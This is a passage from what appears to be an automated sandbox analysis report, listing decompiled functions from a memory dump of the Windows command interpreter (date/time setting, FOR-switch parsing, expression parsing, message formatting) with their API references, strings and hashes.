						_t122 = _t122 - 1;
						if(_t122 != 0) {
							continue;
						}
						L7:
						_t120 = _t120 - 2;
						L8:
						_t91 =  &_v40;
						 *_t120 = 0;
						E001C18C0( &_v40, 0x10, 0x1df80c);
						L10:
						while(1) {
							L10:
							if(_t88 == 0 ||  *_t88 == 0) {
								_t42 =  *0x1dd540; // 0x0
								_t43 = _t42;
								if(_t43 == 0) {
									_t44 = 0x2342;
								} else {
									if(_t43 == 2) {
										_t44 = 0x4000271d;
									} else {
										_t44 = 0x4000271e;
									}
								}
								if(_t124 != 0) {
									_push(0);
									_push(0x2343);
									E001BC108(_t91);
									_t129 = _t128 + 8;
								} else {
									E001BC108(_t91, _t44, 1, 0x1df80c);
									_t129 = _t128 + 0xc;
								}
								__imp___get_osfhandle( &_v624);
								_t128 = _t129 + 4;
								_t113 =  &_v604;
								if(E001D3B11( &_v624,  &_v604, 0, 0x104) == 0) {
									goto L58;
								} else {
									_t50 = _v624;
									if(_t50 == 0) {
										goto L58;
									}
									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
									_t96 =  &_v604;
									_t51 = _v604;
									if(_t51 == 0) {
										L33:
										if(E001C0178(_t51) == 0) {
											_push( &_v604);
											E001C25D9(L"%s\r\n");
											_t128 = _t128 + 8;
										}
										goto L35;
									}
									_t119 = _t51 & 0x0000ffff;
									while(_t119 != 0xa && _t119 != 0xd) {
										_t51 =  *(_t96 + 2) & 0x0000ffff;
										_t96 = _t96 + 2;
										_t119 = _t51;
										if(_t51 != 0) {
											continue;
										}
										goto L33;
									}
									_t51 = 0;
									 *_t96 = 0;
									goto L33;
								}
							} else {
								_t103 = _t88;
								_t11 = _t103 + 2; // 0x2
								_t113 = _t11;
								do {
									_t67 =  *_t103;
									_t103 = _t103 + 2;
								} while (_t67 != 0);
								_t105 = _t103 - _t113 >> 1;
								if(_t103 - _t113 >> 1 >= 0x104) {
									_push(0);
									asm("sbb esi, esi");
									_push(_t124);
									E001BC108(_t105);
									L57:
									L58:
									_t48 = 1;
									L59:
									return E001C6FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
								}
								E001C1040( &_v604, 0x105, _t88);
								L35:
								E001C1040( &_v72, 0x10,  &_v40);
								_t115 = 0x10;
								_t55 =  &_v72;
								while( *_t55 != 0) {
									_t55 = _t55 + 2;
									_t115 = _t115 - 1;
									if(_t115 != 0) {
										continue;
									}
									break;
								}
								asm("sbb ecx, ecx");
								_t101 =  ~_t115 & 0x00000010 - _t115;
								if(_t115 == 0) {
									L48:
									_t113 =  &_v72;
									_t122 = E001BEA40( &_v604,  &_v72, 2);
									if( *_t122 == 0) {
										L61:
										_t48 = 0;
										goto L59;
									}
									GetLocalTime( &_v620);
									_t113 = _t122;
									_t91 =  &_v620;
									_push( &_v40);
									if(_t124 != 0) {
										_t61 = E001D4159( &_v620, _t113);
									} else {
										_t61 = E001D3FD4( &_v620, _t113);
									}
									if(_t61 == 0) {
										L55:
										_push(0);
										asm("sbb eax, eax");
										_push(( ~_t124 & 0x00000003) + 0x232f);
										E001BC108(_t91);
										_t128 = _t128 + 8;
										_t88 = 0;
										continue;
									} else {
										SetLocalTime( &_v620);
										if(SetLocalTime( &_v620) != 0) {
											goto L61;
										}
										if(GetLastError() == 0x522) {
											_push(0);
											_push(GetLastError());
											E001BC5A2(_t91);
											goto L57;
										}
										goto L55;
									}
								}
								_t78 =  &_v72 + _t101 * 2;
								_t118 = 0x10 - _t101;
								if(0x10 == 0) {
									L46:
									_t78 = _t78 - 2;
									L47:
									 *_t78 = 0;
									goto L48;
								}
								_t108 = 0x7ffffffe;
								_t88 = ";" - _t78;
								while(_t108 != 0) {
									_t123 =  *(_t88 + _t78) & 0x0000ffff;
									if(_t123 == 0) {
										break;
									}
									 *_t78 = _t123;
									_t108 = _t108 - 1;
									_t78 =  &(_t78[0]);
									_t118 = _t118 - 1;
									if(_t118 != 0) {
										continue;
									}
									goto L46;
								}
								if(_t118 != 0) {
									goto L47;
								}
								goto L46;
							}
						}
					}
					if(_t122 != 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x001d3cd2
0x001d3cd9
0x001d3cde
0x001d3ce0
0x001d3ce5
0x001d3d3b
0x001d3d48
0x001d3d4f
0x001d3d53
0x00000000
0x001d3ce7
0x001d3ce7
0x001d3cef
0x001d3cf4
0x001d3cf7
0x001d3d01
0x001d3d08
0x00000000
0x00000000
0x001d3d0a
0x001d3d0d
0x001d3d10
0x001d3d13
0x00000000
0x00000000
0x001d3d1b
0x001d3d1b
0x001d3d1e
0x001d3d20
0x001d3d23
0x001d3d2e
0x00000000
0x001d3d58
0x001d3d58
0x001d3d5a
0x001d3d98
0x001d3d9d
0x001d3da0
0x001d3db5
0x001d3da2
0x001d3da5
0x001d3dae
0x001d3da7
0x001d3da7
0x001d3da7
0x001d3da5
0x001d3dbc
0x001d3dd0
0x001d3dd2
0x001d3dd7
0x001d3ddc
0x001d3dbe
0x001d3dc6
0x001d3dcb
0x001d3dcb
0x001d3ded
0x001d3df3
0x001d3df6
0x001d3e05
0x00000000
0x001d3e0b
0x001d3e0b
0x001d3e13
0x00000000
0x00000000
0x001d3e1b
0x001d3e23
0x001d3e29
0x001d3e33
0x001d3e59
0x001d3e62
0x001d3e6a
0x001d3e70
0x001d3e75
0x001d3e75
0x00000000
0x001d3e62
0x001d3e35
0x001d3e38
0x001d3e44
0x001d3e48
0x001d3e4b
0x001d3e50
0x00000000
0x00000000
0x00000000
0x001d3e52
0x001d3e54
0x001d3e56
0x00000000
0x001d3e56
0x001d3d62
0x001d3d62
0x001d3d64
0x001d3d64
0x001d3d67
0x001d3d67
0x001d3d6a
0x001d3d6d
0x001d3d74
0x001d3d7c
0x001d3f94
0x001d3f96
0x001d3fa1
0x001d3fa2
0x001d3fa7
0x001d3faa
0x001d3faa
0x001d3faf
0x001d3fbf
0x001d3fbf
0x001d3d8e
0x001d3e78
0x001d3e84
0x001d3e89
0x001d3e8e
0x001d3e97
0x001d3e9d
0x001d3ea0
0x001d3ea3
0x00000000
0x00000000
0x00000000
0x001d3ea3
0x001d3eb0
0x001d3eb2
0x001d3eb6
0x001d3efe
0x001d3f00
0x001d3f0e
0x001d3f14
0x001d3fd0
0x001d3fd0
0x00000000
0x001d3fd0
0x001d3f21
0x001d3f2a
0x001d3f2c
0x001d3f32
0x001d3f35
0x001d3f3e
0x001d3f37
0x001d3f37
0x001d3f37
0x001d3f45
0x001d3f72
0x001d3f76
0x001d3f78
0x001d3f82
0x001d3f83
0x001d3f88
0x001d3f8b
0x00000000
0x001d3f47
0x001d3f4e
0x001d3f63
0x00000000
0x00000000
0x001d3f70
0x001d3fc0
0x001d3fc8
0x001d3fc9
0x00000000
0x001d3fc9
0x00000000
0x001d3f70
0x001d3f45
0x001d3ec0
0x001d3ec3
0x001d3ec5
0x001d3ef6
0x001d3ef6
0x001d3ef9
0x001d3efb
0x00000000
0x001d3efb
0x001d3ecc
0x001d3ed1
0x001d3ed7
0x001d3edb
0x001d3ee2
0x00000000
0x00000000
0x001d3ee4
0x001d3ee7
0x001d3ee8
0x001d3eeb
0x001d3eee
0x00000000
0x00000000
0x00000000
0x001d3ef0
0x001d3ef4
0x00000000
0x00000000
0x00000000
0x001d3ef4
0x001d3d5a
0x001d3d58
0x001d3d19
0x00000000
0x00000000
0x00000000
0x001d3d19

APIs

_get_osfhandle.MSVCRT ref: 001D3DED
GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 001D3F21
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 001D3F4E
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 001D3F5B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 001D3F65
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 001D3FC2

Strings

%s, xrefs: 001D3E6B
/-., xrefs: 001D3CEA
:, xrefs: 001D3D48

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: LocalTime$ErrorLast$_get_osfhandle
String ID: %s$/-.$:
API String ID: 1033501010-879152773
Opcode ID: 1ffcc7b076be4a355601702e311c75a5f33435234bbb4858a38baf3b756ed7a6
Instruction ID: 3dd5b665e2e140da746bf0dead4dc3dc53fabf0eb2cccf13110bd10a30cee373
Opcode Fuzzy Hash: 1ffcc7b076be4a355601702e311c75a5f33435234bbb4858a38baf3b756ed7a6
Instruction Fuzzy Hash: F281F431A0021997DB249BA8CC4ABFA3375EF94300F54416AE826E77D4EB71DF45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001B9A26 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E001B9A26(void* __eax) {
				void* __edi;
				intOrPtr _t31;
				signed short _t32;
				intOrPtr _t36;
				intOrPtr _t44;
				int _t47;
				intOrPtr _t52;
				void* _t60;
				void* _t70;
				void* _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t96;
				intOrPtr* _t101;

				_t96 = 0;
				__imp___wcsicmp(L"FOR/?", 0x1efaa0);
				_t102 = __eax;
				if(__eax == 0) {
					 *0x1efaa6 = 0;
					_t96 = 1;
				}
				_t63 = 0x2b;
				 *0x1efa8c = 0x1e;
				_t101 = E001BE9A0(_t63, _t102);
				_t31 = 0x2f;
				if(_t96 != 0) {
					 *0x1efaa0 = _t31;
					_t32 = 0x3f;
					 *0x1efaa2 = _t32;
					 *0x1efaa4 = 0;
				} else {
					_t63 = 0;
					E001BF030(0);
				}
				_t88 = 0x2b;
				if(E001BDCE1(_t60, _t88, _t96) != 0) {
					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
					 *_t101 = 0x3c;
					goto L18;
				} else {
					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
					_t36 = 0x25;
					if( *0x1f3cc9 == 0) {
						L13:
						if( *0x1efaa0 != _t36) {
							L45:
							E001D82EB(_t63);
							L17:
							_push(0x1efaa0);
							_push( *(_t101 + 0x38));
							_t89 = 0x1e;
							E001B9C73( *(_t101 + 0x38), _t89);
							E001B9C4D(L"IN");
							_push(0x1efaa0);
							_push( *(_t101 + 0x38));
							_t90 = 0x1e;
							E001B9C73( *(_t101 + 0x38), _t90);
							 *((intOrPtr*)(_t101 + 0x3c)) = E001B9936(_t60);
							E001B9C4D(L"DO");
							_push(0x1efaa0);
							_t91 = 8;
							E001C1040( *(_t101 + 0x38) + 0x2c, _t91);
							_t70 = 0x2b;
							_t44 = E001BDC74(_t60, _t70);
							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
							if(_t44 == 0) {
								E001D82EB(_t70);
							}
							L18:
							return _t101;
						}
						_t47 = iswspace( *0x1efaa2 & 0x0000ffff);
						_pop(_t63);
						if(_t47 != 0) {
							goto L45;
						}
						_t63 = L"=,;";
						 *(_t101 + 0x44) =  *0x1efaa2 & 0x0000ffff;
						if(E001BD7D4(L"=,;",  *0x1efaa2 & 0x0000ffff) != 0 ||  *0x1efa8c != 3) {
							goto L45;
						} else {
							goto L17;
						}
					} else {
						while(1) {
							__imp___wcsicmp(L"/L", 0x1efaa0);
							if(_t36 == 0) {
								goto L30;
							}
							L7:
							__imp___wcsicmp(L"/D", 0x1efaa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
								L25:
								_t36 = E001BF030(0);
								while(1) {
									__imp___wcsicmp(L"/L", 0x1efaa0);
									if(_t36 == 0) {
										goto L30;
									}
									goto L7;
								}
								goto L30;
							}
							__imp___wcsicmp(L"/F", 0x1efaa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
								E001BF030(0);
								_t36 =  *0x1efaa0;
								_t79 = 0x25;
								__eflags = _t36 - _t79;
								if(_t36 == _t79) {
									continue;
								}
								_t80 = 0x2f;
								__eflags = _t36 - _t80;
								if(_t36 == _t80) {
									continue;
								}
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E001D82EB(_t80);
								}
								_t63 = 6 +  *0x1efa8c * 2;
								_t52 = E001C00B0(_t63);
								__eflags = _t52;
								if(_t52 == 0) {
									L41:
									E001D9287(_t63);
									__imp__longjmp(0x1eb8b8, 1);
									L42:
									__eflags = _t63 - 6;
									if(_t63 != 6) {
										__eflags = _t63 - 4;
										if(_t63 != 4) {
											E001D82EB(_t63);
										}
									}
									L12:
									_t36 = 0x25;
									goto L13;
								} else {
									_t94 =  *0x1efa8c + 3;
									L24:
									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
									E001C1040(_t52, _t94, 0x1efaa0);
									goto L25;
								}
							}
							__imp___wcsicmp(L"/R", 0x1efaa0);
							_t63 =  *(_t101 + 0x48);
							if(_t36 == 0) {
								 *(_t101 + 0x48) = _t63 | 0x00000004;
								E001BF030(0);
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E001D82EB(0);
								}
								_t36 =  *0x1efaa0;
								_t86 = 0x25;
								__eflags = _t36 - _t86;
								if(_t36 == _t86) {
									continue;
								} else {
									_t87 = 0x2f;
									__eflags = _t36 - _t87;
									if(_t36 == _t87) {
										continue;
									}
									_t63 = 2 +  *0x1efa8c * 2;
									_t52 = E001C00B0(_t63);
									__eflags = _t52;
									if(_t52 == 0) {
										goto L41;
									}
									_t94 =  *0x1efa8c + 1;
									goto L24;
								}
							}
							if(_t63 == 0 || _t63 == 8) {
								goto L12;
							} else {
								__eflags = _t63 - 2;
								if(_t63 == 2) {
									goto L12;
								}
								__eflags = _t63 - 1;
								if(_t63 == 1) {
									goto L12;
								}
								goto L42;
							}
							L30:
							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
							goto L25;
						}
					}
				}
			}

0x001b9a34
0x001b9a36
0x001b9a3e
0x001b9a40
0x001d1097
0x001d109d
0x001d109d
0x001b9a48
0x001b9a49
0x001b9a58
0x001b9a5c
0x001b9a5f
0x001d10a3
0x001d10ab
0x001d10ac
0x001d10b4
0x001b9a65
0x001b9a65
0x001b9a67
0x001b9a67
0x001b9a6e
0x001b9a76
0x001d10bf
0x001d10c3
0x00000000
0x001b9a7c
0x001b9a7c
0x001b9a89
0x001b9a8a
0x001b9b0a
0x001b9b11
0x001d1154
0x001d1154
0x001b9b57
0x001b9b5f
0x001b9b60
0x001b9b63
0x001b9b64
0x001b9b6e
0x001b9b76
0x001b9b77
0x001b9b7a
0x001b9b7b
0x001b9b8a
0x001b9b8d
0x001b9b95
0x001b9b9b
0x001b9b9c
0x001b9ba3
0x001b9ba4
0x001b9ba9
0x001b9bae
0x001d115e
0x001d115e
0x001b9bb5
0x001b9bb8
0x001b9bb8
0x001b9b1f
0x001b9b25
0x001b9b28
0x00000000
0x00000000
0x001b9b35
0x001b9b3a
0x001b9b44
0x00000000
0x00000000
0x00000000
0x00000000
0x001b9a8c
0x001b9a8f
0x001b9a99
0x001b9aa3
0x00000000
0x00000000
0x001b9aa9
0x001b9ab3
0x001b9abd
0x001b9c3b
0x001b9c19
0x001b9c1b
0x001b9a8f
0x001b9a99
0x001b9aa3
0x00000000
0x00000000
0x00000000
0x001b9aa3
0x00000000
0x001b9a8f
0x001b9acd
0x001b9ad7
0x001b9bb9
0x001b9bbf
0x001b9bc4
0x001b9bcc
0x001b9bcd
0x001b9bd0
0x00000000
0x00000000
0x001b9bd8
0x001b9bd9
0x001b9bdc
0x00000000
0x00000000
0x001b9be2
0x001b9be6
0x001b9c46
0x001b9c46
0x001b9bed
0x001b9bf4
0x001b9bf9
0x001b9bfb
0x001d1127
0x001d1127
0x001d1132
0x001d1138
0x001d1138
0x001d113b
0x001d1141
0x001d1144
0x001d114a
0x001d114a
0x001d1144
0x001b9b07
0x001b9b09
0x00000000
0x001b9c01
0x001b9c07
0x001b9c0a
0x001b9c11
0x001b9c14
0x00000000
0x001b9c14
0x001b9bfb
0x001b9ae7
0x001b9aef
0x001b9af4
0x001d10d1
0x001d10d6
0x001d10db
0x001d10df
0x001d10e1
0x001d10e1
0x001d10e6
0x001d10ee
0x001d10ef
0x001d10f2
0x00000000
0x001d10f8
0x001d10fa
0x001d10fb
0x001d10fe
0x00000000
0x00000000
0x001d1109
0x001d1110
0x001d1115
0x001d1117
0x00000000
0x00000000
0x001d111f
0x00000000
0x001d111f
0x001d10f2
0x001b9afc
0x00000000
0x001b9c25
0x001b9c25
0x001b9c28
0x00000000
0x00000000
0x001b9c2e
0x001b9c30
0x00000000
0x00000000
0x00000000
0x001b9c36
0x001b9c41
0x001b9c41
0x00000000
0x001b9c41
0x001b9a8f
0x001b9a8a

APIs

_wcsicmp.MSVCRT ref: 001B9A36
_wcsicmp.MSVCRT ref: 001B9A99
_wcsicmp.MSVCRT ref: 001B9AB3
_wcsicmp.MSVCRT ref: 001B9ACD
_wcsicmp.MSVCRT ref: 001B9AE7
iswspace.MSVCRT ref: 001B9B1F

Strings

=,;, xrefs: 001B9B35
FOR/?, xrefs: 001B9A2F

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmp$iswspace
String ID: =,;$FOR/?
API String ID: 759518647-2121398454
Opcode ID: 1356b724f18d50e51626c54c87a6fb598d5267b13aa55521e03e4a6cdf6e2673
Instruction ID: e7e546e9bc5ab4abe463454e73968593cb5a6baea69a62b7d289c66b27fee1e1
Opcode Fuzzy Hash: 1356b724f18d50e51626c54c87a6fb598d5267b13aa55521e03e4a6cdf6e2673
Instruction Fuzzy Hash: C161DA31200B815AD738B775AD9ABBA76A1EBD4710F10443EF6078FAD1DB709887C715

Uniqueness

Uniqueness Score: -1.00%

Function 001B64DC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E001B64DC(void* __eflags, intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				signed short* _t39;
				short* _t45;
				int _t50;
				wchar_t* _t54;
				long _t55;
				long _t62;
				signed int _t71;

				E001B9794( &_a8);
				_t39 = _a8;
				_t62 =  *_t39 & 0x0000ffff;
				if(_t62 == 0) {
					L22:
					_a16 = 0x400023cd;
					L9:
					L10:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return _a4;
				}
				if(_t62 == 0x28) {
					_a8 =  &(_t39[1]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E001B6355();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					E001B9794( &_a8);
					_t45 = _a8;
					__eflags =  *_t45 - 0x29;
					if( *_t45 != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 = _t45 + 2;
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t62) != 0) {
					_a8 =  &(_a8[0]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E001B64DC(__eflags);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						goto L21;
					}
					E001B4409( &_a8, _t62, _a12);
					goto L9;
				}
				_t50 = iswdigit(_t62);
				if(_t50 == 0) {
					__eflags = E001B6785( &_a8,  &_v12, __eflags,  &_v8);
					if(__eflags == 0) {
						goto L22;
					} else {
						_a12 = E001B60DE(_v8, __eflags);
						goto L9;
					}
				}
				__imp___errno();
				 *_t50 = 0;
				_t54 = _a8;
				if( *_t54 == 0x30) {
					_t71 = _t54[0] & 0x0000ffff;
					__eflags = _t71 - 0x78;
					if(_t71 == 0x78) {
						L24:
						_t55 = wcstoul(_t54,  &_a8, 0);
						L6:
						_a12 = _t55;
						if(_t55 == 0x7fffffff) {
							__imp___errno();
							__eflags =  *_t55 - 0x22;
							if( *_t55 != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					__eflags = _t71 - 0x58;
					if(_t71 != 0x58) {
						goto L5;
					}
					goto L24;
				}
				L5:
				_t55 = wcstol(_t54,  &_a8, 0);
				goto L6;
			}

0x001b64ea
0x001b64ef
0x001b64f2
0x001b64f8
0x001cac90
0x001cac90
0x001b6589
0x001b658c
0x001b6591
0x001b6592
0x001b6593
0x001b659a
0x001b659a
0x001b6501
0x001b65cf
0x001b65d5
0x001b65d6
0x001b65d7
0x001b65d8
0x001b65d9
0x001b65e3
0x001b65e4
0x001b65e5
0x001b65e6
0x001b65ea
0x001b665c
0x00000000
0x001b665c
0x001b65ef
0x001b65f4
0x001b65f7
0x001b65fb
0x001cac9c
0x001b6601
0x001b6604
0x001b6604
0x00000000
0x001b65fb
0x001b6517
0x001b6624
0x001b6633
0x001b6634
0x001b6635
0x001b6636
0x001b6637
0x001b6641
0x001b6642
0x001b6643
0x001b6644
0x001b6648
0x00000000
0x00000000
0x001b6652
0x00000000
0x001b6652
0x001b651e
0x001b6527
0x001b65ac
0x001b65ae
0x00000000
0x001b65b4
0x001b65bf
0x00000000
0x001b65bf
0x001b65ae
0x001b6529
0x001b6531
0x001b6533
0x001b653a
0x001b6609
0x001b660d
0x001b6610
0x001caca8
0x001cacae
0x001b654c
0x001b654f
0x001b6557
0x001cacb9
0x001cacbf
0x001cacc2
0x00000000
0x00000000
0x001cacc8
0x00000000
0x001cacc8
0x001b655d
0x001b656d
0x001cacd4
0x001cacd4
0x00000000
0x001b656d
0x001b6616
0x001b6619
0x00000000
0x00000000
0x00000000
0x001b661f
0x001b6540
0x001b6546
0x00000000

APIs

wcschr.MSVCRT ref: 001B650D
iswdigit.MSVCRT ref: 001B651E
_errno.MSVCRT ref: 001B6529
wcstol.MSVCRT ref: 001B6546
iswdigit.MSVCRT ref: 001B6564
iswalpha.MSVCRT ref: 001B657A
wcstoul.MSVCRT ref: 001CACAE
_errno.MSVCRT ref: 001CACB9

Strings

+-~!, xrefs: 001B6508

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
String ID: +-~!
API String ID: 2191331888-2604099254
Opcode ID: 090bbce2401e832cc938ad25ebd2e0369adb3a76dda3876ba55c0ad735e40462
Instruction ID: c1921062271c776cff53d1e7bfd710d5640f47f51e704236ad7c4c756105534f
Opcode Fuzzy Hash: 090bbce2401e832cc938ad25ebd2e0369adb3a76dda3876ba55c0ad735e40462
Instruction Fuzzy Hash: 7451AF71400209EFCB15EF64E845AEB37A4FF25360F11811AFD169B180EB78DE54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D213A Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E001D213A(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				void* _t16;
				long _t18;
				intOrPtr* _t41;
				void* _t44;

				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_t41 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t44, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												goto L22;
											} else {
												goto L24;
											}
										} else {
											goto L2;
										}
									}
								} else {
									goto L24;
								}
							} else {
								goto L2;
							}
						} else {
							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
								_v8 = _v8 + 1;
								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
									goto L24;
								} else {
									L22:
									 *_t41 = _v8;
									_t16 = 0;
								}
							} else {
								goto L2;
							}
						}
					} else {
						L24:
						E001D292C("wil", 0x8000ffff);
						_t16 = 0x8000ffff;
					}
				} else {
					L2:
					_t16 = E001D2913("wil");
				}
				return _t16;
			}

0x001d213f
0x001d2140
0x001d2146
0x001d214a
0x001d214c
0x001d2155
0x001d2170
0x001d2183
0x001d2188
0x001d21ca
0x001d21d9
0x001d21e8
0x001d21fd
0x00000000
0x001d220c
0x001d220e
0x001d2217
0x001d2225
0x00000000
0x001d2227
0x00000000
0x001d2227
0x001d2219
0x00000000
0x001d2219
0x001d2217
0x001d21ea
0x00000000
0x001d21ea
0x001d21db
0x00000000
0x001d21db
0x001d218a
0x001d2199
0x001d21a2
0x001d21b1
0x00000000
0x001d222e
0x001d222e
0x001d2231
0x001d2233
0x001d2233
0x001d219b
0x00000000
0x001d219b
0x001d2199
0x001d2179
0x001d223c
0x001d224a
0x001d224f
0x001d224f
0x001d2157
0x001d215c
0x001d2164
0x001d2164
0x001d2257

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,001D2CF5), ref: 001D214C

Strings

wil, xrefs: 001D215F, 001D2245

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: 9424d5531df62729321a40a34f178185a98042112f7fd1c9074036220d9be028
Instruction ID: 5318aa33382d87115f086d83e8a54e51fa8277fc9bb46478fe3b37e9be0986a3
Opcode Fuzzy Hash: 9424d5531df62729321a40a34f178185a98042112f7fd1c9074036220d9be028
Instruction Fuzzy Hash: F1318234700205BBEB249BA1DC84BBB766AEFA1354F208177FA22D6780D774CD42D662

Uniqueness

Uniqueness Score: -1.00%

Function 001D7C83 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E001D7C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v12;
				char _v44;
				short _v112;
				short _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t29;
				void* _t33;
				signed int _t38;
				char* _t43;
				long _t46;
				void* _t47;
				intOrPtr _t59;
				signed int _t60;

				_t56 = __edx;
				_t47 = __ebx;
				_t24 =  *0x1dd0b4; // 0xea614d48
				_v12 = _t24 ^ _t60;
				_t59 = _a4;
				_v120 =  &_a16;
				_v116 = 0;
				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
				_v120 = 0;
				if(_t29 != 0) {
					L5:
					E001C6B76(_t59, L"%s", _v116);
					_t56 =  *((intOrPtr*)(_t59 + 0x10));
					if(E001BBED7(_t59,  *((intOrPtr*)(_t59 + 0x10))) != 0) {
						E001BB6CB(_t59);
					}
					LocalFree(_v116);
					_t33 = 0;
				} else {
					__imp___ultoa(_a8,  &_v44, 0x10);
					_t38 = E001C0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t38),  &_v44, 0xffffffff,  &_v112, 0x20);
					_v128 =  &_v112;
					_t43 = L"Application";
					if(_a8 < 0x2328) {
						_t43 = L"System";
					}
					_v124 = _t43;
					_t46 = FormatMessageW(0x3100, 0, 0x13d, 0,  &_v116, 0xa,  &_v128);
					if(_t46 != 0) {
						goto L5;
					} else {
						_t33 = _t46 + 1;
					}
				}
				return E001C6FD0(_t33, _t47, _v12 ^ _t60, _t56, 0, _t59);
			}

0x001d7c83
0x001d7c83
0x001d7c8b
0x001d7c92
0x001d7c96
0x001d7c9d
0x001d7ca5
0x001d7cb9
0x001d7cbf
0x001d7cc4
0x001d7d3e
0x001d7d48
0x001d7d4d
0x001d7d59
0x001d7d5d
0x001d7d5d
